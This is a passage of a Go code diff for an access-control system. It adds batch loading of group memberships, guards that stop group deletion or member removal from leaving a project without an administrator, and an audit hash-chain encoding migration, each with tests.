+	store := new(MockStorage)
+	c := newBaselineCore(store)
+	ctx := context.Background()
+
+	store.On("ListUsers", mock.Anything, userFilterPageSize(100000)).
+		Return([]*models.User{}, int64(0), nil)
+	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{}, nil)
+	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return(nil, errors.New("membership error"))
+
+	_, err := c.GetPermissionBaseline(ctx)
+	require.Error(t, err)
+}
+
+// TestGetPermissionBaseline_BatchLoadsMembershipOnceForManyUsers is the
+// regression test for #G44: group-inherited grant resolution used to call
+// GetUserGroups once PER USER. With three users — one in two admin-conferring
+// groups, one in a single group, one in no group at all — ListAllUserGroupMemberships
+// must be called exactly ONCE (not three times), and each user's rows must
+// still resolve to exactly their own group memberships, not another user's.
+func TestGetPermissionBaseline_BatchLoadsMembershipOnceForManyUsers(t *testing.T) {
+	store := new(MockStorage)
+	c := newBaselineCore(store)
+	ctx := context.Background()
+
+	userMultiGroup := &models.User{ID: 60, Username: "multi", Email: "multi@example.com"}
+	userOneGroup := &models.User{ID: 61, Username: "one", Email: "one@example.com"}
+	userNoGroup := &models.User{ID: 62, Username: "none", Email: "none@example.com"}
+
+	groupGrantA := &models.GroupRole{GroupID: 70, RoleID: 90}
+	groupGrantB := &models.GroupRole{GroupID: 71, RoleID: 91}
+
+	store.On("ListUsers", mock.Anything, userFilterPageSize(100000)).
+		Return([]*models.User{userMultiGroup, userOneGroup, userNoGroup}, int64(3), nil)
+	store.On("ListAllUserRoleGrants", mock.Anything).Return([]*models.UserRole{}, nil)
+	store.On("ListAllGroupRoleGrants", mock.Anything).Return([]*models.GroupRole{groupGrantA, groupGrantB}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).Return([]stg.UserGroupMembership{
+		{UserID: 60, GroupID: 70},
+		{UserID: 60, GroupID: 71},
+		{UserID: 61, GroupID: 70},
+	}, nil)
+	store.On("GetRole", mock.Anything, uint(90)).Return(&models.Role{ID: 90, Name: "RoleA"}, nil)
+	store.On("GetRolePermissions", mock.Anything, uint(90)).
+		Return([]*models.Permission{{Name: "perm.a"}}, nil)
+	store.On("GetRole", mock.Anything, uint(91)).Return(&models.Role{ID: 91, Name: "RoleB"}, nil)
+	store.On("GetRolePermissions", mock.Anything, uint(91)).
+		Return([]*models.Permission{{Name: "perm.b"}}, nil)
+
+	baseline, err := c.GetPermissionBaseline(ctx)
+	require.NoError(t, err)
+	store.AssertNumberOfCalls(t, "ListAllUserGroupMemberships", 1)
+
+	rowsByUser := make(map[uint][]PermissionBaselineRow)
+	for _, row := range baseline.Rows {
+		rowsByUser[row.UserID] = append(rowsByUser[row.UserID], row)
+	}
+	require.Len(t, rowsByUser[60], 2, "user in two groups gets both groups' rows")
+	require.Len(t, rowsByUser[61], 1, "user in one group gets only that group's row")
+	assert.Empty(t, rowsByUser[62], "user in no group gets no group-inherited rows")
+}
+
 func TestScopeLabel(t *testing.T) {
 	assert.Equal(t, "global", scopeLabel(0, 0))
 	assert.Equal(t, "project:7", scopeLabel(7, 0))
@@ -304,7 +370,6 @@ func TestGetPermissionBaseline_G25Regression(t *testing.T) {
 	directGrantA := &models.UserRole{UserID: 30, RoleID: 40} // permanent, global
 	directGrantB := &models.UserRole{UserID: 31, RoleID: 40, ExpiresAt: &pastExpiry}
 
-	groupG := &models.Group{ID: 50}
 	groupGrant := &models.GroupRole{GroupID: 50, RoleID: 41, ProjectID: 6, EnvironmentID: 8}
 
 	store.On("ListUsers", mock.Anything, userFilterPageSize(100000)).
@@ -320,9 +385,8 @@ func TestGetPermissionBaseline_G25Regression(t *testing.T) {
 	store.On("GetRolePermissions", mock.Anything, uint(41)).
 		Return([]*models.Permission{{Name: "audit.read"}}, nil)
 
-	store.On("GetUserGroups", mock.Anything, uint(30)).Return([]*models.Group{}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(31)).Return([]*models.Group{}, nil)
-	store.On("GetUserGroups", mock.Anything, uint(32)).Return([]*models.Group{groupG}, nil)
+	store.On("ListAllUserGroupMemberships", mock.Anything).
+		Return([]stg.UserGroupMembership{{UserID: 32, GroupID: 50}}, nil)
 
 	baseline, err := c.GetPermissionBaseline(ctx)
 	require.NoError(t, err)

--- a/internal/core/project_members.go
+++ b/internal/core/project_members.go
@@ -245,3 +245,125 @@ func (c *KeyorixCore) resolveProjectAdminHolders(ctx context.Context, targetID u
 	}
 	return c.filterActiveHolders(ctx, holders)
 }
+
+// guardLastProjectAdminGroupDelete is guardLastProjectAdmin's group-deletion
+// counterpart (findings-core/core-project-members.json#3): generalizes
+// guardLastGlobalAdminGroupDelete (#107, global scope only) to every PROJECT
+// scope the group holds a roles.assign-granting role at. Deleting a group
+// cascades to remove EVERY role grant it holds — if one of those grants is a
+// project's last roles.assign holder, deleting the group leaves that project
+// ungoverned (no one able to manage its membership), a gap the global-only
+// guard cannot see.
+func (c *KeyorixCore) guardLastProjectAdminGroupDelete(ctx context.Context, groupID uint) error {
+	projectIDs, err := c.projectAdminScopesHeldByGroup(ctx, groupID)
+	if err != nil {
+		return err
+	}
+	for projectID := range projectIDs {
+		if err := c.guardProjectAdminSurvivesGroupChange(ctx, projectID, func(a storage.RoleAssignment) bool {
+			return a.PrincipalType == "group" && a.PrincipalID == groupID
+		}, nil); err != nil {
+			return fmt.Errorf("refusing to delete group %d: %w", groupID, err)
+		}
+	}
+	return nil
+}
+
+// guardLastProjectAdminGroupMembership is guardLastProjectAdmin's group-
+// membership-removal counterpart (findings-core/core-project-members.json#3):
+// refuses to remove userID from groupID when groupID's project-scoped
+// roles.assign grant is userID's only remaining route to administering that
+// project and no other holder survives either. Unlike a group deletion, the
+// group's own grant row survives a membership removal — only that one
+// member's derived authority through THIS group disappears.
+func (c *KeyorixCore) guardLastProjectAdminGroupMembership(ctx context.Context, userID, groupID uint) error {
+	projectIDs, err := c.projectAdminScopesHeldByGroup(ctx, groupID)
+	if err != nil {
+		return err
+	}
+	for projectID := range projectIDs {
+		if err := c.guardProjectAdminSurvivesGroupChange(ctx, projectID, nil, func(gID, uID uint) bool {
+			return gID == groupID && uID == userID
+		}); err != nil {
+			return fmt.Errorf("refusing to remove user %d from group %d: %w", userID, groupID, err)
+		}
+	}
+	return nil
+}
+
+// projectAdminScopesHeldByGroup returns the project IDs at which groupID
+// holds a project-level (environment_id = 0) role granting roles.assign —
+// every project whose governance depends, at least in part, on this group.
+// A group with no such grant anywhere returns an empty set, so the group-path
+// project-admin guards above are a cheap no-op for the common case (most
+// groups never hold project-admin authority at all).
+func (c *KeyorixCore) projectAdminScopesHeldByGroup(ctx context.Context, groupID uint) (map[uint]bool, error) {
+	assignments, err := c.storage.ListGroupRoleAssignments(ctx, groupID)
+	if err != nil {
+		return nil, fmt.Errorf("failed to resolve group role assignments: %w", err)
+	}
+	checked := make(map[uint]bool, len(assignments))
+	projectIDs := make(map[uint]bool)
+	for _, a := range assignments {
+		if a.EnvironmentID != 0 || a.ProjectID == 0 {
+			continue // not a project-level grant; the global scope has its own guard
+		}
+		hasAssign, ok := checked[a.RoleID]
+		if !ok {
+			var herr error
+			hasAssign, herr = c.storage.RoleSetHasPermission(ctx, []uint{a.RoleID}, permRolesAssign)
+			if herr != nil {
+				return nil, herr
+			}
+			checked[a.RoleID] = hasAssign
+		}
+		if hasAssign {
+			projectIDs[a.ProjectID] = true
+		}
+	}
+	return projectIDs, nil
+}
+
+// guardProjectAdminSurvivesGroupChange checks whether projectID still has a
+// live roles.assign holder after the given group-scoped exclusion — a grant
+// removal (group deletion) or one member's derived authority (membership
+// removal). Reuses resolveGlobalAdminHolders (internal/core/authz.go)
+// verbatim for the group-expansion/exclusion/active-filtering machinery;
+// despite its name that function is scope-agnostic — it only cares which
+// assignment rows are passed in and which role IDs count as "admin". Here the
+// admin-role test is "does this role carry roles.assign" (a permission
+// check, since project administration isn't tied to a specific role name),
+// not the fixed install-admin role-ID set the global guards use.
+func (c *KeyorixCore) guardProjectAdminSurvivesGroupChange(ctx context.Context, projectID uint, excludeAssignment func(storage.RoleAssignment) bool, excludeMember func(groupID, userID uint) bool) error {
+	all, err := c.storage.ListProjectRoleAssignments(ctx, projectID)
+	if err != nil {
+		return fmt.Errorf("failed to check project %d administrators: %w", projectID, err)
+	}
+	projectLevel := make([]storage.RoleAssignment, 0, len(all))
+	assignAdminIDs := make(map[uint]bool)
+	checked := make(map[uint]bool, len(all))
+	for _, a := range all {
+		if a.EnvironmentID != 0 {
+			continue // not project-level; can't administer /projects/{id}/members
+		}
+		projectLevel = append(projectLevel, a)
+		hasAssign, ok := checked[a.RoleID]
+		if !ok {
+			var herr error
+			hasAssign, herr = c.storage.RoleSetHasPermission(ctx, []uint{a.RoleID}, permRolesAssign)
+			if herr != nil {
+				return herr
+			}
+			checked[a.RoleID] = hasAssign
+		}
+		assignAdminIDs[a.RoleID] = hasAssign
+	}
+	holders, err := c.resolveGlobalAdminHolders(ctx, assignAdminIDs, projectLevel, excludeAssignment, excludeMember)
+	if err != nil {
+		return fmt.Errorf("failed to check project %d administrators: %w", projectID, err)
+	}
+	if len(holders) == 0 {
+		return fmt.Errorf("project %d's last administrative role grant would be lost, leaving no roles.assign holder", projectID)
+	}
+	return nil
+}

--- a/internal/core/project_scoped_group_admin_guard_test.go
+++ b/internal/core/project_scoped_group_admin_guard_test.go
@@ -1,0 +1,194 @@
+// project_scoped_group_admin_guard_test.go — regression coverage for
+// core-project-members.json#3 (groups.go:89): DeleteGroup / RemoveUserFromGroup
+// (and their SCIM counterparts) previously only invoked the GLOBAL last-admin
+// guard (guardLastGlobalAdminGroupDelete/Membership, #107) — a group holding a
+// project's last roles.assign-conferring grant could be deleted, or have its
+// last live member removed, with no guard at all, silently leaving that
+// project with zero administrators. guardLastProjectAdminGroupDelete/
+// Membership close that gap by generalizing guardLastProjectAdmin (the
+// existing direct-user-removal guard, project_members.go) to the group path,
+// mirroring guardLastGlobalAdminGroupDelete/Membership's own shape exactly.
+package core
+
+import (
+	"context"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/core/storage"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestDeleteGroup_RefusesLastProjectAdmin(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "proj7-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u.ID, group.ID, 0))
+
+	err = c.DeleteGroup(ctx, actor, group.ID)
+	require.Error(t, err, "must refuse to delete a group holding project 7's last roles.assign grant")
+	assert.Contains(t, err.Error(), "last administrative role grant")
+
+	_, getErr := st.GetGroup(ctx, group.ID)
+	require.NoError(t, getErr, "group must not have been deleted when the guard refuses")
+}
+
+func TestDeleteGroup_AllowsWhenAnotherProjectAdminExists(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true})
+	require.NoError(t, err)
+	other, err := st.CreateUser(ctx, &models.User{Username: "raj", Email: "raj@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "proj7-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u.ID, group.ID, 0))
+	// An independent, direct project_admin grant at the same project survives
+	// the group's deletion.
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, other.ID, "project_admin"))
+
+	err = c.DeleteGroup(ctx, actor, group.ID)
+	require.NoError(t, err, "deleting the group is fine when another project admin survives")
+}
+
+func TestDeleteGroup_AllowsWhenGroupHoldsNoProjectAdminRole(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "engineering"})
+	require.NoError(t, err)
+
+	err = c.DeleteGroup(ctx, actor, group.ID)
+	require.NoError(t, err, "deleting a group that confers no admin role at any scope must still work")
+}
+
+func TestDeleteGroup_RefusesWhenGroupAdminsMultipleProjects(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const projA, projB = uint(7), uint(8)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true})
+	require.NoError(t, err)
+	other, err := st.CreateUser(ctx, &models.User{Username: "raj", Email: "raj@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "multi-proj-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: projA}))
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: projB}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u.ID, group.ID, 0))
+	// projB has an independent survivor; projA does not.
+	require.NoError(t, c.AddProjectMember(ctx, actor, projB, other.ID, "project_admin"))
+
+	err = c.DeleteGroup(ctx, actor, group.ID)
+	require.Error(t, err, "must refuse when even ONE of the group's administered projects would be left with no admin")
+	assert.Contains(t, err.Error(), "last administrative role grant")
+}
+
+func TestRemoveUserFromGroup_RefusesLastProjectAdminMember(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "proj7-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u.ID, group.ID, 0))
+
+	err = c.RemoveUserFromGroup(ctx, actor, u.ID, group.ID, 0)
+	require.Error(t, err, "must refuse to remove the group's only member when that member is project 7's last admin route")
+	assert.Contains(t, err.Error(), "last administrative role grant")
+
+	members, mErr := st.ListGroupMembers(ctx, group.ID)
+	require.NoError(t, mErr)
+	require.Len(t, members, 1, "membership must not have been removed when the guard refuses")
+}
+
+func TestRemoveUserFromGroup_AllowsWhenAnotherGroupMemberSurvives(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u1, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true})
+	require.NoError(t, err)
+	u2, err := st.CreateUser(ctx, &models.User{Username: "raj", Email: "raj@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "proj7-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u1.ID, group.ID, 0))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u2.ID, group.ID, 0))
+
+	err = c.RemoveUserFromGroup(ctx, actor, u1.ID, group.ID, 0)
+	require.NoError(t, err, "removing one of two group members is fine — the other still derives project-admin authority")
+
+	members, mErr := st.ListGroupMembers(ctx, group.ID)
+	require.NoError(t, mErr)
+	require.Len(t, members, 1)
+	assert.Equal(t, u2.ID, members[0].ID)
+}
+
+// TestDeprovisionSCIMGroup_RefusesLastProjectAdmin proves the SCIM path (which
+// bypasses core.DeleteGroup entirely — see scim_groups.go's own inline guard
+// calls) got the same project-scope fix, not just the native path.
+func TestDeprovisionSCIMGroup_RefusesLastProjectAdmin(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "priya", Email: "priya@example.com", IsActive: true, ExternalID: "okta|priya"})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "scim-proj7-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, c.AddUserToGroup(ctx, actor, u.ID, group.ID, 0))
+
+	err = c.DeprovisionSCIMGroup(ctx, actor, group.ID)
+	require.Error(t, err, "SCIM group deprovisioning must also refuse to strip project 7's last admin route")
+
+	_, getErr := st.GetGroup(ctx, group.ID)
+	require.NoError(t, getErr, "group must not have been deleted when the guard refuses")
+}

--- a/internal/core/scim_groups.go
+++ b/internal/core/scim_groups.go
@@ -198,10 +198,16 @@ func (c *KeyorixCore) PatchSCIMGroup(ctx context.Context, actorID, groupID uint,
 	// Check every removal against guardLastGlobalAdminMembership (#G02) BEFORE
 	// applying any of them, so a PATCH that would strip the install's last route
 	// to global-admin authority is refused atomically — see
-	// applyGroupMembershipChanges's identical precheck-then-apply shape.
+	// applyGroupMembershipChanges's identical precheck-then-apply shape. Also
+	// checked against guardLastProjectAdminGroupMembership (core-project-
+	// members.json#3) so a removal can't strip a project's last roles.assign
+	// holder either — SCIM group management previously only saw the global case.
 	toRemove := filterNonZero(removeIDs)
 	for _, id := range toRemove {
 		if err := c.guardLastGlobalAdminMembership(ctx, id, groupID); err != nil {
+			return nil, err
+		}
+		if err := c.guardLastProjectAdminGroupMembership(ctx, id, groupID); err != nil {
 			return nil, err
 		}
 	}
@@ -277,13 +283,18 @@ func filterNonZero(ids []uint) []uint {
 
 // applyGroupMembershipChanges applies the add/remove sets computed by the
 // caller. Every removal is checked against guardLastGlobalAdminMembership
-// (#G02) BEFORE any storage write happens, so a SCIM PUT that would strip the
-// install's last route to global-admin authority is refused atomically — not
-// applied member-by-member with some removals already committed.
+// (#G02) and guardLastProjectAdminGroupMembership (core-project-members.json#3)
+// BEFORE any storage write happens, so a SCIM PUT that would strip the
+// install's last route to global-admin authority, or a project's last
+// roles.assign holder, is refused atomically — not applied member-by-member
+// with some removals already committed.
 func (c *KeyorixCore) applyGroupMembershipChanges(ctx context.Context, groupID uint, want map[uint]bool, current []*models.User, toAdd []uint) error {
 	for _, u := range current {
 		if !want[u.ID] {
 			if err := c.guardLastGlobalAdminMembership(ctx, u.ID, groupID); err != nil {
+				return err
+			}
+			if err := c.guardLastProjectAdminGroupMembership(ctx, u.ID, groupID); err != nil {
 				return err
 			}
 		}
@@ -301,10 +312,15 @@ func (c *KeyorixCore) applyGroupMembershipChanges(ctx context.Context, groupID u
 
 // DeprovisionSCIMGroup handles a SCIM DELETE — removes the group (membership links
 // go with it). Refuses to delete a group holding the install's last
-// global-admin-conferring role grant (guardLastGlobalAdminGroupDelete, #G02) —
-// the same guard the native DeleteGroup already applies.
+// global-admin-conferring role grant (guardLastGlobalAdminGroupDelete, #G02) or
+// any project's last roles.assign-conferring grant
+// (guardLastProjectAdminGroupDelete, core-project-members.json#3) — the same
+// guards the native DeleteGroup already applies.
 func (c *KeyorixCore) DeprovisionSCIMGroup(ctx context.Context, actorID, groupID uint) error {
 	if err := c.guardLastGlobalAdminGroupDelete(ctx, groupID); err != nil {
+		return err
+	}
+	if err := c.guardLastProjectAdminGroupDelete(ctx, groupID); err != nil {
 		return err
 	}
 	// Storage-direct: the SCIM path emits scim.group_deprovisioned below, not the

--- a/internal/core/storage/interface.go
+++ b/internal/core/storage/interface.go
@@ -898,6 +898,15 @@ type Storage interface {
 	// (RFC 7644). Returns the not-found error when no user carries that external id.
 	GetUserByExternalID(ctx context.Context, externalID string) (*models.User, error)
 	GetUserGroups(ctx context.Context, userID uint) ([]*models.Group, error)
+	// ListAllUserGroupMemberships returns every user_groups row in the
+	// deployment, unfiltered by project scope (#G44) — the batch-load
+	// counterpart to GetUserGroups: GetPermissionBaseline uses this to load
+	// every user's group membership in one query instead of one GetUserGroups
+	// call per user, a genuine N+1 whose cost scales with the deployment's own
+	// user count. Preserves GetUserGroups' exact per-user multiplicity (a user
+	// with both a global and a project-scoped membership row for the same
+	// group yields two rows here too, matching GetUserGroups' unfiltered JOIN).
+	ListAllUserGroupMemberships(ctx context.Context) ([]UserGroupMembership, error)
 
 	// Password history (ADR-025 history_count). AddPasswordHistory records a
 	// bcrypt hash; RecentPasswordHashes returns the most recent `limit` hashes
@@ -1996,6 +2005,13 @@ type RoleAssignment struct {
 	RoleID        uint   `json:"role_id"`
 	ProjectID     uint   `json:"project_id"`
 	EnvironmentID uint   `json:"environment_id"`
+}
+
+// UserGroupMembership is one user→group membership row, as returned by
+// ListAllUserGroupMemberships.
+type UserGroupMembership struct {
+	UserID  uint `json:"user_id"`
+	GroupID uint `json:"group_id"`
 }
 
 // GroupRoleGrant is a role assigned to a group together with the grant's optional

--- a/internal/core/storage/interface.go
+++ b/internal/core/storage/interface.go
@@ -1191,6 +1191,34 @@ type Storage interface {
 	// that already starts at genesis (the purge only removed the legacy
 	// unchained prefix, or the table is now empty) ignores a non-nil anchor.
 	VerifyAuditChain(ctx context.Context, anchor *AuditChainAnchor) (*AuditChainVerification, error)
+	// MigrateAuditChainEncoding re-derives entry_hash/prev_hash for every chained
+	// audit_events row, in ascending id order, under computeAuditEntryHash's
+	// current (length-prefixed) encoding — closing the gap left when that
+	// encoding replaced the prior NUL-delimited one (a breaking, non-content-
+	// preserving hash-format change; see computeAuditEntryHash's doc comment).
+	// The unchained legacy prefix (pre-ADR-029 rows with an empty entry_hash) is
+	// left untouched.
+	//
+	// anchor has EXACTLY the same meaning and applicability rule as
+	// VerifyAuditChain's own anchor parameter: when non-nil AND the earliest
+	// chained row's CURRENTLY STORED prev_hash is not auditGenesisHash (a prior
+	// sanctioned retention purge moved the chain start), the walk seeds from
+	// anchor.PrevHash instead of genesis. The caller MUST have already
+	// authenticated anchor; this layer trusts it literally.
+	//
+	// Holds the same cross-process exclusivity LogAuditEvent uses (Postgres
+	// advisory lock; SQLite's own single-writer semantics) for the ENTIRE
+	// migration, in one transaction — not just per batch — so no concurrently
+	// appended row can be hashed against a partially-migrated chain. Callers
+	// MUST ensure no other process can reach this database's audit_events table
+	// for the duration (this transaction only prevents concurrent writes
+	// THROUGH this same storage backend's own LogAuditEvent path, not from an
+	// entirely separate process/connection pool bypassing it).
+	//
+	// dryRun computes and returns the same result WITHOUT persisting anything
+	// (the transaction is rolled back), so an operator can preview row/anchor
+	// counts before committing.
+	MigrateAuditChainEncoding(ctx context.Context, dryRun bool, anchor *AuditChainAnchor) (*AuditChainMigrationResult, error)
 	// CreateAuditCheckpoint appends a signed checkpoint of the chain head (ADR-029).
 	CreateAuditCheckpoint(ctx context.Context, cp *models.AuditCheckpoint) error
 	// UpdateAuditCheckpointAnchor stores the external-notary anchor (RFC 3161 token,
@@ -1903,6 +1931,27 @@ type AuditChainAnchor struct {
 	RowID     uint
 	PrevHash  string
 	EntryHash string
+}
+
+// AuditChainMigrationResult reports the outcome of MigrateAuditChainEncoding.
+type AuditChainMigrationResult struct {
+	// RowsMigrated is the number of chained rows whose entry_hash/prev_hash
+	// were (or, under dry-run, would be) rewritten.
+	RowsMigrated int64
+	// UnchainedRowsSkipped is the legacy pre-ADR-029 prefix left untouched.
+	UnchainedRowsSkipped int64
+	// HeadID/HeadHash are the migrated chain's final row id and its newly
+	// computed entry_hash (auditGenesisHash-derived if RowsMigrated is 0).
+	HeadID   uint
+	HeadHash string
+	// AnchorRowID/AnchorNewEntryHash are set when the earliest migrated row's
+	// id matches the anchor the caller seeded this call with (seedPrevHash
+	// came from a real retention anchor, not genesis) — the caller must re-sign
+	// and persist an updated anchor for AnchorRowID using AnchorNewEntryHash
+	// (its PrevHash is unchanged; it represents an already-purged predecessor
+	// that cannot be recomputed). Zero/empty when no anchor applies.
+	AnchorRowID        uint
+	AnchorNewEntryHash string
 }
 
 // UnusedSecretStat is one row of the unused-secrets report. LastRead is nil when

--- a/internal/storage/store/local_audit_chain.go
+++ b/internal/storage/store/local_audit_chain.go
@@ -15,6 +15,7 @@ import (
 	"crypto/sha256"
 	"encoding/binary"
 	"encoding/hex"
+	"errors"
 	"strconv"
 	"time"
 
@@ -257,6 +258,113 @@ func (ls *LocalStorage) VerifyAuditChain(ctx context.Context, anchor *storage.Au
 	result.HeadID = headID
 	return result, nil
 }
+
+// MigrateAuditChainEncoding re-derives entry_hash/prev_hash for every chained
+// audit_events row under computeAuditEntryHash's current encoding, in one
+// transaction spanning the whole migration (holding the same cross-process
+// exclusivity LogAuditEvent uses for its own append, so no concurrently
+// appended row can interleave against a partially-migrated chain). See the
+// storage.Storage interface doc for the full contract, including why callers
+// must still ensure no other process reaches this database concurrently.
+func (ls *LocalStorage) MigrateAuditChainEncoding(ctx context.Context, dryRun bool, anchor *storage.AuditChainAnchor) (*storage.AuditChainMigrationResult, error) {
+	result := &storage.AuditChainMigrationResult{}
+
+	err := ls.db.WithContext(ctx).Transaction(func(tx *gorm.DB) error {
+		if tx.Dialector.Name() == "postgres" {
+			if err := tx.Exec("SELECT pg_advisory_xact_lock(?)", int64(auditAdvisoryLockKey)).Error; err != nil {
+				return err
+			}
+		}
+
+		prevHash := auditGenesisHash
+		started := false
+		var lastID uint
+		firstBatch := true
+		firstChainedID := uint(0)
+		firstChainedNewHash := ""
+		anchorApplies := false
+
+		for {
+			var batch []*models.AuditEvent
+			if err := tx.
+				Where("id > ?", lastID).
+				Order("id ASC").
+				Limit(auditChainVerifyBatch).
+				Find(&batch).Error; err != nil {
+				return err
+			}
+			if len(batch) == 0 {
+				break
+			}
+			if firstBatch {
+				firstBatch = false
+				// Mirror VerifyAuditChain's exact applicability rule: only seed from
+				// the anchor if the earliest row that WOULD start the chain (first
+				// non-empty-entry_hash row) currently carries a non-genesis
+				// prev_hash — i.e. a prior purge genuinely moved the chain start.
+				for _, e := range batch {
+					if e.EntryHash == "" {
+						continue
+					}
+					if anchor != nil && e.PrevHash != auditGenesisHash {
+						prevHash = anchor.PrevHash
+						anchorApplies = true
+					}
+					break
+				}
+			}
+			for _, e := range batch {
+				if !started {
+					if e.EntryHash == "" {
+						result.UnchainedRowsSkipped++
+						continue
+					}
+					started = true
+					firstChainedID = e.ID
+				}
+				newHash := computeAuditEntryHash(e, prevHash)
+				if e.ID == firstChainedID {
+					firstChainedNewHash = newHash
+				}
+				if e.PrevHash != prevHash || e.EntryHash != newHash {
+					if err := tx.Model(&models.AuditEvent{}).Where("id = ?", e.ID).
+						Updates(map[string]interface{}{"prev_hash": prevHash, "entry_hash": newHash}).Error; err != nil {
+						return err
+					}
+				}
+				prevHash = newHash
+				result.HeadID = e.ID
+				result.RowsMigrated++
+			}
+			lastID = batch[len(batch)-1].ID
+			if len(batch) < auditChainVerifyBatch {
+				break
+			}
+		}
+
+		result.HeadHash = prevHash
+		if anchorApplies && firstChainedID != 0 {
+			// The earliest migrated row is the anchor's row; the caller must
+			// re-sign the anchor with this row's newly computed entry_hash (its
+			// PrevHash is unchanged — it represents an already-purged predecessor
+			// that cannot be recomputed under any encoding).
+			result.AnchorRowID = firstChainedID
+			result.AnchorNewEntryHash = firstChainedNewHash
+		}
+		if dryRun {
+			return errAuditMigrationDryRun
+		}
+		return nil
+	})
+	if err != nil && !errors.Is(err, errAuditMigrationDryRun) {
+		return nil, err
+	}
+	return result, nil
+}
+
+// errAuditMigrationDryRun is a sentinel used to force MigrateAuditChainEncoding's
+// transaction to roll back after computing (but never persisting) its result.
+var errAuditMigrationDryRun = errors.New("audit chain migration dry run")
 
 // verifyBatchEvents processes one page of audit events against the running hash chain.
 // Returns the new prevHash, the last verified headID, the updated started flag, and

--- a/internal/storage/store/local_audit_chain_migrate_test.go
+++ b/internal/storage/store/local_audit_chain_migrate_test.go
@@ -1,0 +1,179 @@
+package store
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/keyorixhq/keyorix/internal/core/storage"
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// appendLegacyEncodedEvent inserts a row already stored with a hash chain,
+// then rewrites its prev_hash/entry_hash to simulate a row that was chained
+// under a DIFFERENT (older) encoding than computeAuditEntryHash currently
+// produces — exactly the state MigrateAuditChainEncoding exists to repair.
+func appendLegacyEncodedEvent(t *testing.T, ls *LocalStorage, desc string, at time.Time, prevHash string) *models.AuditEvent {
+	t.Helper()
